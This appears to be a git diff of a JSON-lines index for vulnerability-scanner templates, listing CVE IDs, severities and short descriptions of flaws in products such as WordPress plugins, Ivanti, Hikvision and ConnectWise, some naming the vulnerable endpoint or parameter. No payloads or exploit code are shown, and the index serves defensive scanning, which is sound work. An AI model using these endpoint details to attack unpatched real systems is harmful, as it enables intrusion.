{"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"}
|
||||||
{"ID":"CVE-2023-45852","Info":{"Name":"Viessmann Vitogate 300 - Remote Code Execution","Severity":"critical","Description":"In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-45852.yaml"}
|
{"ID":"CVE-2023-45852","Info":{"Name":"Viessmann Vitogate 300 - Remote Code Execution","Severity":"critical","Description":"In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-45852.yaml"}
|
||||||
{"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"}
|
{"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"}
|
||||||
|
@ -2244,6 +2252,7 @@
|
||||||
{"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"}
|
{"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"}
|
||||||
{"ID":"CVE-2023-47643","Info":{"Name":"SuiteCRM Unauthenticated Graphql Introspection","Severity":"medium","Description":"Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-47643.yaml"}
|
{"ID":"CVE-2023-47643","Info":{"Name":"SuiteCRM Unauthenticated Graphql Introspection","Severity":"medium","Description":"Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-47643.yaml"}
|
||||||
{"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"}
|
{"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"}
|
||||||
|
{"ID":"CVE-2023-48777","Info":{"Name":"WordPress Elementor 3.18.1 - File Upload/Remote Code Execution","Severity":"critical","Description":"The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-48777.yaml"}
|
||||||
{"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"}
|
{"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"}
|
||||||
{"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"}
|
{"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"}
|
||||||
{"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"}
|
{"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"}
|
||||||
|
@ -2270,18 +2279,34 @@
|
||||||
{"ID":"CVE-2023-6553","Info":{"Name":"Worpress Backup Migration \u003c= 1.3.7 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6553.yaml"}
|
{"ID":"CVE-2023-6553","Info":{"Name":"Worpress Backup Migration \u003c= 1.3.7 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6553.yaml"}
|
||||||
{"ID":"CVE-2023-6623","Info":{"Name":"Essential Blocks \u003c 4.4.3 - Local File Inclusion","Severity":"critical","Description":"Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6623.yaml"}
|
{"ID":"CVE-2023-6623","Info":{"Name":"Essential Blocks \u003c 4.4.3 - Local File Inclusion","Severity":"critical","Description":"Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6623.yaml"}
|
||||||
{"ID":"CVE-2023-6634","Info":{"Name":"LearnPress \u003c 4.2.5.8 - Remote Code Execution","Severity":"critical","Description":"The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6634.yaml"}
|
{"ID":"CVE-2023-6634","Info":{"Name":"LearnPress \u003c 4.2.5.8 - Remote Code Execution","Severity":"critical","Description":"The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6634.yaml"}
|
||||||
|
{"ID":"CVE-2023-6831","Info":{"Name":"mlflow - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-6831.yaml"}
|
||||||
{"ID":"CVE-2023-6875","Info":{"Name":"WordPress POST SMTP Mailer \u003c= 2.8.7 - Authorization Bypass","Severity":"critical","Description":"The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6875.yaml"}
|
{"ID":"CVE-2023-6875","Info":{"Name":"WordPress POST SMTP Mailer \u003c= 2.8.7 - Authorization Bypass","Severity":"critical","Description":"The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6875.yaml"}
|
||||||
|
{"ID":"CVE-2023-6895","Info":{"Name":"Hikvision Intercom Broadcasting System - Command Execution","Severity":"critical","Description":"Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6895.yaml"}
|
||||||
{"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"}
|
{"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"}
|
||||||
{"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"}
|
{"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"}
|
||||||
{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"}
|
{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"}
|
||||||
{"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"}
|
{"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"}
|
||||||
|
{"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"}
|
||||||
{"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"}
|
{"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"}
|
||||||
|
{"ID":"CVE-2024-0713","Info":{"Name":"Monitorr Services Configuration - Arbitrary File Upload","Severity":"high","Description":"A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-0713.yaml"}
|
||||||
|
{"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"medium","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"}
|
||||||
{"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"high","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"}
|
{"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"high","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"}
|
||||||
|
{"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"}
|
||||||
|
{"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"}
|
||||||
|
{"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"}
|
||||||
|
{"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"}
|
||||||
|
{"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"}
|
||||||
{"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"}
|
{"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"}
|
||||||
{"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"}
|
{"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"}
|
||||||
{"ID":"CVE-2024-21887","Info":{"Name":"Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection","Severity":"critical","Description":"A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-21887.yaml"}
|
{"ID":"CVE-2024-21887","Info":{"Name":"Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection","Severity":"critical","Description":"A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-21887.yaml"}
|
||||||
{"ID":"CVE-2024-21893","Info":{"Name":"Ivanti SAML - Server Side Request Forgery (SSRF)","Severity":"high","Description":"A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-21893.yaml"}
|
{"ID":"CVE-2024-21893","Info":{"Name":"Ivanti SAML - Server Side Request Forgery (SSRF)","Severity":"high","Description":"A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-21893.yaml"}
|
||||||
{"ID":"CVE-2024-22024","Info":{"Name":"Ivanti Connect Secure - XXE","Severity":"high","Description":"Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-22024.yaml"}
|
{"ID":"CVE-2024-22024","Info":{"Name":"Ivanti Connect Secure - XXE","Severity":"high","Description":"Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-22024.yaml"}
|
||||||
|
{"ID":"CVE-2024-22319","Info":{"Name":"IBM Operational Decision Manager - JNDI Injection","Severity":"critical","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-22319.yaml"}
|
||||||
|
{"ID":"CVE-2024-22320","Info":{"Name":"IBM Operational Decision Manager - Java Deserialization","Severity":"high","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-22320.yaml"}
|
||||||
|
{"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"}
|
||||||
|
{"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
|
||||||
|
{"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
|
||||||
|
{"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"}
|
||||||
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
|
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
|
||||||
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
|
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
|
||||||
{"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"}
|
{"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"}
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
24979948d83a1e549dbe56133dba3db5
|
d1c0809e63305403ca431401cfcebe07
|
||||||
